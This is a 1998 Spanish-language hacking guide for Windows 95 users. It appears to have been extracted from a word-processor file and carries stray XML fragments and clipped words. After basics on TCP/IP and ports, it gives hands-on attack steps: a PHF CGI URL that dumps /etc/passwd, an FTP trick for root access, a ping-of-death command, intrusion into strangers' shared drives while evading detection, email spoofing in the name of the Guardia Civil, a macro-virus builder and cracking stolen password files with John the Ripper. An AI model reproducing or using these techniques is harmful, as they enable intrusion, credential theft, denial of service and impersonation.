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13-01-1998.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 xml:space="preserve">??????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>°±°±²±°±²±°±²±°±²±°±²±°±²±°±²±°±²±°</w:t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>°±ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»±°</w:t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>°±ºÚ  LA SUPER GUIA DEL HACKER ¿º±°</w:t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>°±º³ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»³º±°</w:t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>°±º³ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼³º±°</w:t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 xml:space="preserve">°±ºÀ        by NOBODY          Ùº±°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>°±ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼±°</w:t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>°±°±²±°±²±°±²±°±²±°±²±°±²±°±²±°±²±°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()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()(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ta Del Autor: No me hago responsable de la mala utilizacion de la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informacion aqui expuesta ya que tan solo es para fines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didacticos.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Esta guia es de distribucion libre excepto para las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instituciones gubernamentales que deberan abonar 2000 pts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a alguna fundacion para apadrinar ni¤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()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()(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- INDICE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1 ......................... Que Es Esta Guia Exactamente ?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2 ......................... Descripcion General De Window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2a ....................... Seguridad En Windows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3 ......................... Protocolo TCP/IP y Demas Historia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3a ....................... Puerto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3b ....................... Ftp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3c ....................... Telnet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4 ......................... Hacking Basico En Windows.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a ....................... Phf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b ....................... Ftp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c ....................... Ping De La Muerte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d ....................... Recursos Compartido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e ....................... Fake Mail Con El Telnet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f ....................... Cambiando El Entorno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g ....................... Finger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h ....................... Whoi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i ....................... Tracert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5 ......................... Utilizacion De Tool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a ....................... SkamWerks Lab version 1.1b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b ....................... WaReZ! Version 95.12.31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c ....................... John the Ripper v1.4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d ....................... Gobbler v 2.1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e ....................... Modificando el WS_FTP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f ....................... Sharepasswd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g ....................... Snadboy's Revelation v1.1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h ....................... Keylog95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i ....................... Glide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j ....................... Win95 AnonyMail v 1.0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k ....................... Hacker's Utility, V 1.02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l ....................... Haktek v1.1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m ....................... Claymore Brute Force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6 ......................... Medidas De Seguridad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6a ....................... Protegiendo Nuestro Ordenador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a1 ..................... Ataques Tipicos a Nuestro Windows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a2 ..................... Encriptacion De Nuestra Informacion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a3 ..................... Eliminar Informacion De Forma Segura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a4 ..................... Eliminacion De Virus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6b ....................... Protegiendo Nuestras Acciones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b1 ..................... Borrando Nuestras Huellas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b2 ..................... Encriptando Nuestro Corre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7 ......................... Sugerencias Para Un Mejor Hacking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8 ......................... Obtener Informacion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9 ......................... Despedida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9a ....................... Agradecimient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()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()(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1. Que Es Esta Guia Exactamente ?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guia esta enfocado hacia todo aquel que quiere ser hacker pero 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iere aprender unix o no lo sabe manejar (grave error). Pues por est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zon esta guia esta enfocada a los usuarios de windows, principalm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s de win95. Por el contrario esta guia no se dedicara al NT o Unix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nque por supuesto se hara referencia a estos sistemas sobre todo cuan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n estos mismos Sistemas Operativos en los cuales se centraran nuestr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ctos, supuestamente legales :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odo esto que digo puede sonar tonterias y puedes p0ensar que en win95 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dras llegar a ser un gran hacker porque es necesario conocer unix,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oy totalmente de acuerdo, pero solo pretendo dar una oportunidad pa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cer sus pinitos a aquellos que solo saber usar win95, yo por mi par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consejo aprender unix por varias razones que no viene a cuento en est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ui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 esta guia te convertiras en un magnifico Hacker usando un sistema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 es propenso al hacking. Como es normal al usar win95 estaremos mu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imitados en muchos aspectos pero podras aprender por ejemplo, algun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g que podras usar en tu favor, la utilizacion de diversas herramient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cker que no estan disponibles generalemente en win95 y ademas a usar l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ursos que te ofrece Internet en tu favor, abreviando un poco tant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harla, llegaras a conocer la red de una forma diferente y a manejar win9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forma distinta a lo conocido hasta ahor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2. Descripcion General De Window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todos sabemos el windows95 es un popular sistema operativo de la cas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icrosoft, el cual es conocido tanto por sus adepto ya que es muy sencill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vistoso pero al igual tambien es muy conocido por su inseguridad en casi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odos sus aspectos, ademas no ofrece tanta versativilidad como otr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stemas operativos. Por ejemplo este es el caso de su "Multitarea" la cua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 virtual y no real, si quieres hacer la prueba pon en marcha el defrag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jecuta otro programa :) y veras esa famosa Multitare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win95 es un sistema operativo de 32 bits multitarea, que es muy como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la gente que busca facilidad, pero no te enga¤es pensando que es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stema ideal para Internet, puede que para un usuario convencional le se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upendo pero para un Hacker se queda muy corto de calle, ya que le falt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uchos servicios que otros sistemas operativos si traen como el que y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antas veces he repetido, el Unix (se nota que me encanta??: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qui os dejo de dar la murga sobre win95 ya que este texto no esta destina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 hablar sobre este sistema sino a usarlo para hackear. Ademas no creo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contando nada nuevo sobre windows o sea que mejor me callo y si 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abes mucho sobre win95, pues ya sabes comprate un libr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2a. Seguridad En Window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todos sabemos la seguridad en win95 es nula, es decir, win95 no tien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guridad por si mismo, un claro ejemplo de esto que es las ventanas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s piden un password las podemos cerrar pulsando sobre la X o tambi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s basta con pulsar ctrl+atl+supr, con lo que nos salteremo esta ventan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sin meter ningun password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 eso para que nuestro ventanas (nombre que se le da a win95:) tendr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instalarle algun paquete de seguridad disponible por la red, que ha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uchos y buenos y lo mejor es que son Freeware (gratis) aunque siempr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edes comprar algun paquete comercial de seguridad, en mi opinion algun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eces una tonteria, ya que nos pueden cobrar un precio abusivo y cuan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lega la oportunidad de demostrar su calidad nos falla, ya que no hay nad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guro 100%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oteger nuestro win95 es cosa de cada uno pero tranquilidad, que la cos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 es muy dificil, es cuestion de estar atento a las novedades, en otr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labras estar informado. Mas abajo ya te entereras de estas cos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3. Protocolo TCP/IP y Demas Histori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protocolo TCP/IP, es el mas usado y seguramente no lo sabias, ya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globa casi todos los servicios que solemos usar como por ejemplo cuan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cemos telnet, mail, ftp o cualquier cos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CP/IP proviene de Transmission Control Protocol y Internet Protoco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spectivamente. Por fortuna para los usuarios de win95, este protocol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a viene incorporado nativamente en el sistema, al contrario que ocurri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 el windows 3.x, el cual lo teniamos que instalar para poder conect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 Interne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has podido comprobar en realidad son 2 protocolos pero que esta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idos, el primero o sea el TCP es el encargado de las comunicaciones y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transmision de los paquetes cuando estamos conectados a un servidor.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P es el encargado de que los paquetes llegen a destino por orden aun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omen caminos diferent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 xml:space="preserve">* Diagrama del TCP *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liente -&gt;  El cliente le envia una  -&gt; servidor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solicitud de conexion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espeficicando el puerto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de conexion al servid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liente &lt;-  El servidor le responde  &lt;- servidor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que conoce su peticion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de conex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liente -&gt;  El cliente le devuelve   &lt;- servidor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otra vez la peticion y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el circuito ya e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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>abier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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>* Diagrama del IP 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 xml:space="preserve">³Informacion general³Direccion IP³Direccion IP³Datos³ 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³de cabezera.       ³de origen   ³de destino. ³     ³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es aqui se acaba la explicacion basica de este protocolo, para el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interesado en profundizar le remito a que se pille el RFC 1180 o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chero disponible en multitud de servidores, desgraciadamente no te pue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segurar el nombre del fichero ya que lo he encontrado de varias form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ero te dare el nombre que aparece al editarlo, ya que en todos es igual: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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Introductio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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>t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>the Internet Protocol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>C                       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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>C       S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Computer Science Facilities Group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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>C       I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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>L                       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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>RUTGERS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The State University of New Jersey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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>3 July 1987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3a. Puerto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ntes ya os he explicado muy brevemente la comunicacion del protocolo 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estion. Pues ahora os pongo una extensa lista sobre los distint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uertos y sus servicios correspondiente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cho                7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cho                7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iscard             9/tcp    sink nul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iscard             9/udp    sink nul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at             11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at             11/tcp    user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aytime            13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aytime            13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etstat            15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qotd               17/tcp    quot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qotd               17/udp    quot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hargen            19/tcp    ttytst sourc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hargen            19/udp    ttytst sourc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tp-data           20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tp                21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elnet             23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mtp               25/tcp    mai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me               37/tcp    tim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me               37/udp    tim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lp                39/udp    resource      # resource locati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ame               42/tcp    name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ame               42/udp    name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ois              43/tcp    nicname       # usually to sri-nic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omain             53/tcp    nameserver    # name-domain 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omain             53/udp    name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ameserver         53/tcp    domain        # name-domain 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ameserver         53/udp    domai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tp                57/tcp                  # deprecate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ootp              67/udp                  # boot program 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ftp               69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je                77/tcp    netrj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inger             79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ink               87/tcp    ttylink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updup             95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hostnames         101/tcp    hostname      # usually from sri-nic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so-tsap          102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ictionary        103/tcp    webst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x400              103/tcp                  # ISO Mai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x400-snd          104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snet-ns          105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p               109/tcp    postoffic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p2              109/tcp                  # Post Offic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p3              110/tcp    postoffic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rtmap           111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rtmap           111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unrpc            111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unrpc            111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uth              113/tcp    authenticati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ftp              115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th              117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ucp-path         117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ntp              119/tcp    usenet        # Network News Transf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tp               123/udp    ntpd ntp      # network time protocol (exp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bname            137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bdatagram        138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bsession         139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eWS              144/tcp    new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gmp              153/udp    sgm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cprepo           158/tcp    repository    # PCMAI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nmp              161/udp    snm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nmp-trap         162/udp    snm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int-srv         170/tcp                  # network PostScript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mnet             175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oad              315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mnet0            400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tek             500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iff              512/udp    comsat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xec              512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login             513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o               513/udp    who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hell             514/tcp    cmd           # no passwords use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log            514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inter           515/tcp    spooler       # line printer spool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alk              517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talk             518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fs               520/tcp                  # for LucasFilm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oute             520/udp    router route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imed             525/udp    time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empo             526/tcp    newdat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ourier           530/tcp    rpc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onference        531/tcp    chat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vd-control       531/udp    MIT disk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etnews           532/tcp    readnew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etwall           533/udp                 # -for emergency broadcast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ucp              540/tcp    uucpd        # uucp daem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klogin            543/tcp                 # Kerberos authenticated rlogi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kshell            544/tcp    cmd          # and remote shel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ew-rwho          550/udp    new-who      # experimenta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motefs          556/tcp    rfs_server rfs# Brunhoff remote filesystem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monitor          560/udp    rmonitord     # experimenta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onitor           561/udp                  # experimental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garcon            600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itrd            601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usboy            602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ctmaster        700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ctslave         701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ct              702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ctlogin         703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ctprinter       704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lcsd             704/udp                  # errlog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ctinfo          705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ctslave2        706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acctdisk          707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kerberos          750/tcp    kdc          # Kerberos authentication--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kerberos          750/udp    kdc          # Kerberos authentication--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kerberos_master   751/tcp                 # Kerberos authenticati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kerberos_master   751/udp                 # Kerberos authenticati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asswd_server     752/udp                 # Kerberos passwd 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serreg_server    753/udp                 # Kerberos userreg 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krb_prop          754/tcp                 # Kerberos slave propagatio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rlogin           888/tcp                 # Login and environment passing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kpop             1109/tcp                 # Pop with Kerbero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hone            1167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greslock       1524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ze             1666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fs              2049/udp                  # sun nf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knetd            2053/tcp                  # Kerberos de-multiplexo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eklogin          2105/tcp                  # Kerberos encrypted rlogin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mt              5555/tcp    rmt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tb              5556/tcp    mtbd          # mtb backu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n              9535/tcp                  # remote man server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                9536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ntst           9537/tcp                  # remote man server, testing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news           10000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0           10000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queue           10001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1           10001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oker           10002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2           10002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gateway         10003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3           10003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emp            10004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4           10004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5           10005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6           10006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7           10007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8           10008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9           10009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a           10010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rscsb           10011/ud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qmaster         10012/tcp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qmaster         10012/udp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verdad es que no te quejaras :) de esta lista. Si quieres m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formacion sobre los puertos con su debida explicacion mirate el RFC 1060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3b. Ft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ongo que a estas alturas sabras lo que es el FTP, File Transfer Protoco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 sea Protocolo de Transferencia de Ficheros y como podras observar en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istado de los puertos al FTP le corresponde el 21. Este servicio hay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ocerlo muy bien ya que ademas que nos sirve para subir o bajar ficher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ambien nos puede ayuda en nuestros propositos :), por supuesto el hacking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no dispones de ningun cliente FTP, el propio win95 lleva incorporado uno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unico problema es que no es muy vistoso ya que funciona en modo MS-D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ero es muy versatil y perfecto para nosotros. Para ejecutarlo basta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ctivemos una ventana MS-DOS y en la linea de comados escribamos FTP y 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ndra en modo FTP. Un ejemplo seria est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ftp   &lt;- Escribimos FT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tp&gt;      &lt;- activado el modo FT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no sabes manejarlo, escribiendo un "?" o "help" saldran todos l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andos disponibles del FTP, como no viene a cuento no los explicare per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scando por hay podras hallar informacion de lo que hace cada cosa per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 mejor es que lo averigues tu soli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3c. Telne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 suerte los usuarios de win95 con el telnet tienen mas suerte o men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gun se mire, ya que el servico de Telnet de win95 que tambien est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corporado en el sistema, es muy facil de manejar y ademas tiene ventan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opia. Por eso si ejecutamos telnet se abrira una ventana y lo unico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enemos que hacer es ir al menu en la opcion "conectar" y dentro de aqui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de "sistema remoto", entonces se activara otra ventana en la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s saldra tres opciones, la primera "nombre de host" es donde quer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ectar, "puerto" a que puerto conectamos, por defecto el 23 y por ultim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enemos "tipo de terminal" que no hace falta cambiarl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telnet es importante ya que es asi como entramos a una cuenta en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rvidor y podremos hacer lo que tengamos permitido en el sistema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gicamente entraremos en una cuenta si tenemos el login y passwor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4. Hacking Basico En Window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 fin ya se a acabo el latazo de la explicacion de como moverse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in95. Ahora ya podemos empezar a jugar un poco por inet :), siempr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 puro placer pero jamas con malos fin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esta seccion os explicare varias maneras de hacking usando el win95 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elo o sea sin utilizar ninguna herramienta extern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a. Ph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primera tecnica ya es muy conocida y la verdad es que tendremos suer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nos funciona pero todavia sigue vigente y doy fe de ello }:-) solo ha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saber buscar y tener pacienci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que esto nos funcione solo tenemos que tener un navegador instala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nuesto win95, por defecto suele venir el IE o sea que no podras deci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no tienes, siempre y cuando hallas instalado los paquetes extr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 que tenemos que hacer es ir con nuestro navegador a algun servidor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rra sobre unix (muchos). Conectamos con un servidor en cuestion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ww.victima.com, ya estamos viendo su web, llegados aqui, a esa linea l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¤adim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ttp://www.victima.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passw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ya he dicho si todo sale bien nos aparecera el fichero de password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l servidor con lo que solo nos queda grabarlo en nuestro HD. Por supues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PHF tiene muchas variantes por eso te aconsejo que busce algo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ofundice en esta tecnica al igual que tambien busce informacion sobr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fichero passwd de unix para comprenderl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b. Ft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ntes ya te he explicado el funcionamiento del FTP de win95, ahora l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saremos para sacer el fichero de password de un servidor. Desde un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entana del MS-DOS llamamos al programa FTP y escribim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tp&gt; open victima.com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ect to victima.com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220 victim.com FTP server ready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tp&gt; quote user ftp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331 Guest login ok, send ident as passwor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tp&gt; quote cwd ~root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530 Please login with USER and PAS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tp&gt; quote pass ftp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230 Guest login ok, access restrictions apply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tp&gt; dir (o lo que querramos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como siempre es el caso si todo sale bien estaremos metidos en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stema como root (en lenguaje unix significa el superusuario, o sea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controla el servidor). Por desgracia esta tecnica es muy antigua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 que mas seguro no funcionara pero todo es posibl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c. Ping De La Muer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tecnica no es propia de un Hacker sino de un Lamer (no quiero deci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racker para no ofender a nadie :) ya que unicamente sirve para tirar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rvidor o sea que se desconecta de Internet y esto puede represent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randes perdidas a una empresa. Con esto solo os quiero decir que aun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qui os lo explicare no es cuestion que lo useis por Internet atacan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rvidor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utilidad Ping sirve principalmente para saber si un servidor esta activ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ademas podemos calcular el trafico en la red segun el tiempo de su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spuesta. Basicamente se le envia un paquete a un servidor y este n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testa, solo que si se le envia un paquete muy grande puede lleg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sordenado, por lo que el servidor pide al origen que le vuelva a envi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a parte o la totalidad del paquete, por lo que se produce un datagram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l ping muy grande y producira su caida. Para ejecutar este ataque sol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enemos que escribir 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c:\&gt;ping -l 65510 victima.com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es esta simple linea es muy destructiva, por lo que tened cuidado y ant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hacer tonterias leed la parte sobre seguridad de la gui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d. Recursos Compartidos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win95 NO tiene seguridad nos permite colarnos en el disco duro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tra persona por Internet y lo mejor del caso es que esta tecnica nos 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oporciona los propios programas del win95. Por supuesto no todo es ta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ncillo ya que hay que cumplir unos requisitos. Esto se debe a una ma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figuracion del propio usuario al no configurar adecuadamente l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cursos compartidos de su red corriendo sobre win95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colarnos en el HD de otro ordenador debenos tener nuestro ordenad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ien configurado, o sea el compartir recursos bien puesto y tambien tene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Netbios instalado. Para configurarlo, tenemos que tener activado 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pcion de "compartir ficheros e impresoras" en MIPC-&gt;Panel de Control-&gt;Red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por el caso la opcion esta desactivada simplemente pulsamos el boton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"a¤adir" y a¤adimos el servicio "Compartir ficheros e impresoras en red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icrosoft". En la misma ventana, debemos tener el "Primer inicio de sesion"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"Cliente para redes Microsoft". Tambien tiene que estar activado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"Cliente para redes Microsoft", que viene por defecto en MIPC-&gt;Acces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elefonico a Redes-&gt;Conexion a Inet que usaremos-&gt;boton derecho-&gt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opiedades, debiendo estar activada la casilla "conectarse a la red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hora ya podemos ponernos manos a la obra, entonces volvemos a un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entana del MS-DOS y ejecutam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nbtstat -A (IP DE LA VICTIMA)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etBIOS Remote Machine Name Tabl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ame               Type         Status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ICTIMAMACHINE    &lt;00&gt;    UNIQUE     Registere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ICTIMAGROUP      &lt;00&gt;    GROUP      Registere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ICTIMAMACHINE    &lt;03&gt;    UNIQUE     Registere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ICTIMAMACHINE    &lt;20&gt;    UNIQUE     Registered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ICTIMAGROUP      &lt;1E&gt;    GROUP      Registere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AC Address = 44-45-53-54-00-0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ndo ejecutamos este comando nos saldra una tabla como esta y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mer 'UNIQUE' de tipo &lt;00&gt; es el nombre de la victima y como pued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er la maquina se llama VICTIMAMACHIN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tonces ahora creamos/editamos el archivo LMHOSTS, si por el cas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contrais uno que pone LMHOSTS.SAM no lo toqueis, poniendo la direccion IP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el nombre de la maquina en cuestion, esto seria de la siguiente form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edit c:\windows\system32\LMHOST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VICTIMAMACHIN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tonces cerramos el fichero y desde un ventana del MS-DOS ejecuta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 comando para a¤adir el ordenador de la victima a nuestro Netbios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o seria de la siguiente forma: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NBTSTAT -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hora nos interesa saber que recursos comparte la victima y esto tampoc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s traera complicacion algun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net view \\VICTIMAMACHIN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ared resources at \\VICTIMAMACHIN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harename    Type         Commen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ANCO        Disk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como podemos observar comparte una carpeta llamada BANC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hora ya podemos operar como si fuese una terminal mas en nuestra red loca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bre win95. Ya solo nos queda ejecutar el comando que querramos, si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jemplo queremos ver el contenido, solo tenemos que escribir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 dir \\VICTIMAMACHINE\BANC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 para leer cualquier fichero de la carpet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 type \\VICTIMAMACHINE\BANCO\CUENTABANCARIA.TX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queremos conectar al recurso compartido de forma grafica (o sea co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a ventana y no seguir usando el MS-DOS), solo tenemos que puls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ICIO-&gt;BUSCAR PC y dentremos el PC remoto pero esto solo es posibl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hemos a¤adido la VICTIMAMACHINE a una unidad de red a la que poda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lamar, deberemos ejecutar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NET USE e: \\MIPC\WINDOW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tecnica solo funciona si la maquina remota ejecuta win95 o win 3.11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emas comparte las carpetas sin contrase¤a en modo "Acceso a niv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partido" MIPC-&gt;Panel de control-&gt;Red | Control de acceso. Si utiliza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"Acceso a nivel de usuario" nuestro grupo debe estar autorizado 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a maquina. Podemos probar a intentar insertar el grupo de nuestra maquin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que este autorizada, esto lo conseguiremos con el Regedit,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sgracia los sistemas win95 y OSR2 que estan ejecutando el Servidor Web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ersonal de Microsoft desactivan esta posibilidad de acceso remoto tr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formar de la conveniencia de hacerlo al usuario, ya que el servidor web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bliga a compartir carpetas aun sin tener red loc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gicamente un usuario que haya tenido el despiste de conectarse a Internet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 carpetas compartidas no toma luego medidas de control sobre qui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tra en su maquina. Pero no hay que hacer ilusiones ya que podemos se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illados si por ejemplo un usuario ejecuta el programa Netwatch,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uestra los usuarios conectados a nuestra computadora en cada momento y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uesto el nombre de las computadoras por lo que es aconsejable cambiar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mbre de nuestra computadora usando el Regedit. Si nuestra maquina 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lama HACKERNOBO cambiamos todas la cadenas donde aperezca este nombre co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Regedit a un nombre menos sospechos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no conectamos la VICTIMAMACHINE como una unidad mas a nuest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putadora no nos tendremos que preocupar del Netwatch, asi conseguir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a cierta seguridad personal ya que lo mas seguro, la VICTIMAMACHINE no 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ara cuenta de nuestra entrada. Tambien hay que decir que si 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ICTIMAMACHINE quiere apagar su computadora le saldra el mensaje del tip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"hay otros usuarios conectados a su ordenador, si apaga se desconectaran"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ocurre esto seremos pilla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e. Fake Mail Con El Telne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tecnica nos ayuda a suplantar la direccion de correo electronica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rramos :). La verdad es que tiene pocos usos, en mi opinion debido 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a serie de razones pero siempre puede servir para gastar una buen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roma enviando aun amigo un mail del director de la Universidad dicien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ha sido expulsado por pirata }:-) y no te cuento si es un mail de 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uardia Civi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verdad es que es muy sencillo de hacer pero por supuesto habra que tom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as ciertas medidas de seguridad, que ya explicare luego. Lo primer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tenemos que hacer es ejecutar el cliente Telnet (sobre el manejo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elnet ya lo explique mas arriba) y donde pone "puerto" en vez de pone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puerto 23 pondremos el 25 que corresponde al puerto del mail y espera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 que nos conectemos a ese puerto, cuando conectemos nos saldra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nsaje y esta esperando a que pulsemoa alguna tecl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20 Howdy From mail.airmail.net running Smail 3.1.30.16 (ESMTP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 xml:space="preserve">[d/o/u/g] ready at Thu, 10 Oct 96 00:03:17 -500 (CDT)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uchas veces lo que podemos hacer es escribir "help" y saldran todos l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andos, tambien podemos escribir "echo" y la maquina nos contestara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lista. Para escribir un mail hay que seguir una serie de pas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mail from:gc.uco@mad.servicom.es &lt;- ponemos de donde vien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servidor nos contest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250 &lt;gc.uco@mad.servicom.es&gt; ... Sender Okay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hora escribim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cpt to:nob_ody@xxxxxxxx.com &lt;- a quien se lo enviam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servidor nos contesta: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250 &lt;nob_ody@xxxxxxxx.com&gt; ... Recipiant Okay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hora escribim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data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servidor nos contest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354 Enter mail, end with "." on a line by itself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hora escribim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To: nob_ody@xxxxxxxx.com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From: gc.uco@mad.servicom.es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Subject: Te querremos!!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ueno nobody, solo te queremos decir que nos gusta tu trabajo y t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erremos fichar para el departamento.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>Direccion General de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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>la Guardia Civil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.  &lt;- para terminar el mail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servidor nos contest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250 Mail accepted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hora escribim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quit  &lt;- ya esta todo listo :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es ves como es realmente simple!! Pero antes de empezar a jugar co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tecnica tenemos que asegurarnos que el servidor de mail no regrist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uestro IP, esto lo podremos averiguar si enviamos un mail de prueba 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guna cuenta anomima que tengamos. Si vemos que en la cabecera del mai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ale nuestro IP ese servidor no sirve. Hay listas disponibles por Internet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bre servidores que permiten hacer es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f. Cambiando El Entorn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tecnica no es que sea propia del hacking ya que solo sirve pa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ambiar la pantalla de inicio o la de finalizar windows. Los logos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indows tienen un formato BMP 320X400 pero estan clamuflados en ficher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 extension SYS pero siguen siendo realmente BMP'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logo del principio de windows (ya sabes el de las nubes) lo podei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contrar com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logo.sy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no encuentras este fichero, entonces lo que tenemos que hacer es crearl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grabarlo alli mismo y cuando windows vuelva a reiniciar usara nuestr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rafico y si lo volvemos a quitar, usara el de siempre. El logo del fina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(cuando cierra windows) esta en el directorio windows y lo pod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contrar com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windows&gt;logos.sy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gicamente es obligatorio que los graficos que querramos sustitui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engan de tama¤o 320x400 y sean ficheros BMP'S. Conviene que les ponga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atributo de ocultos, que esto se hace con el comando Attrib,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jempl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windows&gt;attrib +h logos.sys &lt;- lo ocult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windows&gt;attrib -h logos.sys &lt;- lo hace visibl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g. Finge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utilidad Finger, muy usada en Unix, en realidad no esta disponible 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in95 pero como somos Hackers nosotros si que somos capaces desde Win95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nger se utiliza para obtener informacion de un servidor. Puede parece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a tonteria pero es util, por ejemplo, podemos empezar a sacar los Login'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los usuarios y empezar a adivinar sus passwords, tambien pod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igilar al root del servidor (cada cuanto tiempo conecta, cuando fue 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ltima vez que estuvo, etc...) y asi muchas cos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verdad es que para usar el Finger usaremos cualquier navegador, IE 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etscape. Simplemete nos dirigimos a un url un poco especial, es un web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permite hacer Finger a cualquier host y nos deveulve los resultados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o se conoce como "Finger Gateway". El url del web e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ttp://www.hgp.med.umich.edu/cgi-bin/finger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h. Whoi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utilidad Whois, al igual que Finger es muy comun en Unix y no est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sponible en Win95 pero comos somos asi de listos saldremos del apur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ambien sirve para pedir informacion de un servidor pero no el igual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nger, ya que se diferencian en el tipo de informacion, el finger se suel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tilizar mucho para buscar direcciones de correo mientras que el Whois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averiguar informacion sobre un servidor en concre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usar esta utilidad, ejecutamos el Telnet y nos dirigimos a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ost muy especial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telnet whois.internic.ne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 supuesto Internic, una empresa privada norte ameriacana que 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carga de controlar los dominios de Internet, y podemos usar su ba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datos para pedir informacion sobre un servid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ndo conectemos a la base de datos de Internic, escribimos "Whois nombre_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l_servidor" y nos sacara la inform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lnet InterNIC &gt; whois aol.com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nnecting to the rs Database . . . . . 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nnected to the rs Databas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merica Online (AOL-DOM)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12100 Sunrise Valley Driv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ston, Virginia 22091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omain Name: AOL.COM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Administrative Contact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O'Donnell, David B  (DBO3)  PMDAtropos@AOL.COM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703/453-4255 (FAX) 703/453-4102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echnical Contact, Zone Contact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merica Online  (AOL-NOC)  trouble@aol.net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703-453-5862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Billing Contact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arrett, Joe  (JB4302)  BarrettJG@AOL.COM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703-453-4160 (FAX) 703-453-400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cord last updated on 13-Mar-97.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cord created on 22-Jun-95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omain servers in listed order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NS-01.AOL.COM               152.163.199.42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NS-02.AOL.COM               152.163.199.56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DNS-AOL.ANS.NET              198.83.210.28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vemos hemos pedido informacion sobre AOL.COM, American On-Line. Y es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 lo que nos ha sacado Internic. Al final podemos ver los domini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sociados a AOL. Pues sencillo y muy util, el whois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4i. Tracer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utilidad que si esta implementada en Win95, nos sirve para calcul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tiempo que tarda un paquete de un servidor hasta otro y ademas pod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aber por cuantos servidores pasa. Muy util para sacar posibles servidor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ictimas si nos llaman la aten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usar esta utilidad, abrimos una ventana MS-DOS y escribimos Tracert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 secas y nos sacara el menu de opciones disponibl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tracer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sage:tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_nam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ptions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-d                 Do not resolve addresses to hostnames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-h maximum_hops    Maximum number of hops to search for target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-j host-list       Loose source route along host-list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-w timeout         Wait timeout milliseconds for each reply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es como veis, no tiene ningun misterio las opciones del Tracert,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 que ya aprendereis su uso con la experiencia. Ahora escribimos un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reccion IP cuando invocamos al Tracert, de la siguente form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tracert 198.83.210.28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racing route to dns-aol.ans.net [198.83.210.28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ver a maximum of 30 hop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1   *        *        *     Request timed out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2 138 ms  145 ms  135 ms 204.134.78.201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3 212 ms  191 ms  181 ms glory-cyberport.nm.westnet.net [204.134.78.33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4 166 ms  228 ms  189 ms enss365.nm.org [129.121.1.3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5 148 ms  138 ms  177 ms h4-0.cnss116.Albuquerque.t3.ans.net [192.103.74.45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6 284 ms  296 ms  178 ms f2.t112-0.Albuquerque.t3.ans.net [140.222.112.221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7 298 ms  279 ms  277 ms h14.t64-0.Houston.t3.ans.net [140.223.65.9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8 238 ms  234 ms  263 ms h14.t104-0.Atlanta.t3.ans.net [140.223.65.18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9 301 ms  257 ms  250 ms dns-aol.ans.net [198.83.210.28]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race complete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qui podeis por todos lo sitios que ha pasado el paquete que hemos envia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 IP 198.83.210.28. Y asi podemos con todos los servidores de Interne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5. Utilizacion De Tool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esta seccion os explicare diferentes tools que podeis usar para hacking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 supuesto hay que buscarlas por Internet, no pondre el url pa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contrarlas, ya que a lo mejor cuando estas leyendo esta guia ya no existe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ero os dire como se llama el programa asi lo podras buscar ademas es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ambien te servira para que te espabiles y sepas buscar cosas por Interne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gicamente esta guia es para win95 y los programas que explicare sera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win95 pero tambien me veo obligado a explicar varias tools que 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n de win95 propiamente sino de MS-DOS pero que son necesarias y adem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rren en modo MS-DOS de win95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a. Skamwerks lab version 1.1b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programa es un util herramienta que nos ayuda a crear de forma rapid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irus macro, o sea para el Word. Tiene que estar instalado el Word pa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este programa nos funcion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 ejecutar el programa nos aparecera una ventana con 2 botones los caul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n las 2 opciones que podemos escoger "Virii Wizard" o "Advanced Users"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"virii Wizard" es la opcion, si no sabemos muy bien como crear un viru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macro ya que nos moveremos por varios menus y crearemos un virus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ma rapida y facilmente. La otra opcion, "Advanced Users" es pa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quellos que sepan de Word Basic, el lenguaje de programacion del Word, y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podemos meter codigo Word basic directamente y asi crear un virus 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uestro gus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este no es un curso sobre virus, no me voy a enrollar sobre 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tilizacion exacta del programa. En mi opinion es un buen programa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ingles :) programado en C++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b. WaReZ! Version 95.12.3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programa es un cliente FTP que muestra los directorios ocultos en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rvidor, util si nos metemos en algun sitio sospechoso. Como ya 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stumbre para que nos funcione tenemos que tener instalado el WINSOCK.DL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rrecta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 igual que antes tampoco hay que explicar mucho sobre este programa y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su Interface es igual que el cliente WS_FTP que suele ser muy famili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todos, por lo que no encontraremos mucha dificultad en su manej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c. John the ripper v1.4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magnifica tool no es propiamente de win95 pero seria un pecado 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blar de ella, cuando corre sobre win95 de maravilla (bueno, dentro de l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cabe :). John, como se le conoce, sirve para crackear un fichero unix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password (el conocido etc/passwd, como ya digo aprended algo de unix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ndo robemos un fichero passwd de un servidor, lo que tenemos que hace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 usar el John para sacar cuentas, pero no solo basta esto sino tambi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ecesitamos un buen diccionario y una combinacion de suerte y pacienci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ongamos que ya tenemos todo (fichero passwd, John y un diccionario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tonces tenemos que abrir una ventana MS-DOS y llamar al John, si l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lamamos sin nigun parametro nos saldran un listado de opciones, esto seri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si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joh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sage: john [flags] [passwd files]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lags:-pwfile:&lt;file&gt;[,..]     specify passwd file(s)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wordfile:&lt;file&gt; -stdin wordlist mode, read words from &lt;file&gt; or stdi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rules                  enable rules for wordlist mod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incremental[:&lt;mode&gt;]   incremental mode [using john.ini entry &lt;mode&gt;]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single                 single crack mode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external:&lt;mode&gt;        external mode, using john.ini entry &lt;mode&gt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restore[:&lt;file&gt;]       restore session [from &lt;file&gt;]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makechars:&lt;file&gt;       make a charset, &lt;file&gt; will be overwritten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show                   show cracked password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test                   perform a benchmark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users:&lt;login|uid&gt;[,..] crack this (these) 